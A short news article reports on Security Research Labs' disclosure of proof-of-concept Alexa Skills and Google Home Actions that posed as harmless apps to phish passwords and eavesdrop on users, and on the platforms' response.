Researchers from the firm Security Research Labs created the apps, known as Skills for Alexa and Actions for Google Home, which exploited security vulnerabilities to hack devices, as reported by Ars Technica. SRL created several apps for each platform which appeared to be legitimate skills like a horoscope app, but which actually hid malicious code.

The apps were able to collect personal data including passwords, and also eavesdrop on users even after they thought that the speaker was no longer listening. This worked by the app giving a fake error message which sounded as if it had closed, while it actually continued operating, even taking down a transcript of everything the user said after that point.

All of the malicious apps were approved by moderation teams, and were only removed when the researchers disclosed the issue to Amazon and Google. "To prevent 'Smart Spies' attacks, Amazon and Google need to implement better protection, starting with a more thorough review process of third-party Skills and Actions made available in their voice app stores," the SLR researchers concluded.

Both companies say they are now strengthening their processes for reviewing apps, but the prevalence of malicious smartphone apps on platforms like the Google Play Store demonstrates how difficult the task of security vetting apps is.

SLR had advice for smart speaker users as well: "The privacy implications of an internet-connected microphone listening in to what you say are further reaching than previously understood. Users need to be more aware of the potential of malicious voice apps that abuse their smart speakers. Using a new voice app should be approached with a similar level of caution as installing a new app on your smartphone."